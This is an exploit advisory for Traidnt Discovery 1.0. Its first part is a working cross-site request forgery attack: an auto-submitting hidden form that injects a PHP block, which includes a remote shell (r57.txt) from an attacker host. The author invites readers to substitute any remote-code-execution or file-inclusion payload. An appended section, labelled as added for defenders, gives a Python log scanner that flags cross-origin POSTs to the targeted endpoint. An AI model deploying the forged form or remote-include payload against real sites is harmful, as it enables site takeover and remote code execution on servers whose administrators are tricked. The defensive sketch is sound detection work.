Traidnt Discovery version 1.0 suffers from PHP shell and cross-site request forgery vulnerabilities.
# Exploit Title: Traidnt Discovery - [CSRF] inject Blocks With PHP Codes
# Date: 11-06-2010
# Author: G0D-F4Th3r
# Software Link: http://discovery.traidnt.com/demo/
# Version: 1.0
# Tested on: http://discovery.traidnt.com/demo/
====================================[form]================================================
<html>
<form name="r00t" action="http://site/[path]/admincp/blocks.php?do=addnew&go=insert" method="POST">
<body onload="document.forms.r00t.submit();">
<input type="hidden" name="name" value="G0D-F4Th3r"/>
<input type="hidden" name="display" value="1"/>
<input type="hidden" name="place" value="0"/>
<input type="hidden" name="php" value="1"/>
<input type="hidden" name="view" value="0"/>
<input type="hidden" name="author" value="G0D-F4Th3r"/>
<input type="hidden" name="link" value="http://site/[path]/"/>
<input type="hidden" name="code" value="{
if($_GET['ss']=="sn"){
include('http://attacker/r57.txt');
}
}"/>
</form>
</html>
====================================
After that, open your code:
http://site/[path]/index.php?ss=sn
====================================
Attention:
You can change this
{
if($_GET['ss']=="sn"){
include('http://attacker/r57.txt');
}
}
to any code with remote code execution or local file inclusion.
It depends on what you like :)
====================================
Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My
Friends
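
====================================
Detection sketch for defenders, added here as an example (not part of the original advisory or of Traidnt's code): it scans web server access logs for POSTs to the block-insert endpoint shown in the form above and flags those whose Referer is missing or points at another site. The Combined Log Format, the host name cms.example.test, the /cms/ path prefix and all sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$')

def referer_host(referer):
    """Lower-cased host of a Referer header, or None if absent or unparsable."""
    try:
        return (urlsplit(referer).hostname or "").lower() or None
    except ValueError:
        return None

def classify(line, site_host):
    """Return (ip, timestamp, verdict) for a block-insert POST, else None."""
    m = LOG_RE.match(line.strip())
    if not m or m["method"] != "POST":
        return None
    try:
        target = urlsplit(m["target"])
    except ValueError:
        return None
    query = parse_qs(target.query)
    if (not target.path.endswith("/admincp/blocks.php")
            or query.get("do") != ["addnew"] or query.get("go") != ["insert"]):
        return None
    if m["referer"] in ("", "-"):
        verdict = "missing-referer"   # stripped by policy or proxy: review manually
    elif referer_host(m["referer"]) != site_host.lower():
        verdict = "cross-origin"      # form was submitted from another site
    else:
        verdict = "same-origin"       # normal use of the admin panel
    return m["ip"], m["ts"], verdict

def suspicious(lines, site_host):
    """All block-insert POSTs that did not come from the site's own pages."""
    hits = (classify(line, site_host) for line in lines)
    return [h for h in hits if h and h[2] != "same-origin"]

# Constructed sample log lines (not from a real server); hosts and IPs are placeholders.
SAMPLE = [
    '192.0.2.10 - - [11/Jun/2010:10:00:01 +0000] "POST /cms/admincp/blocks.php?do=addnew&go=insert HTTP/1.1" 200 512 "http://cms.example.test/cms/admincp/blocks.php?do=addnew" "Mozilla/5.0"',
    '192.0.2.10 - - [11/Jun/2010:10:05:00 +0000] "POST /cms/admincp/blocks.php?do=addnew&go=insert HTTP/1.1" 200 512 "http://other.example.net/page.html" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Jun/2010:10:07:30 +0000] "POST /cms/admincp/blocks.php?do=addnew&go=insert HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [11/Jun/2010:10:09:00 +0000] "GET /cms/index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]
```

Referer checks only surface attempts after the fact; a per-session anti-CSRF token verified by the handler is what stops the forged request itself.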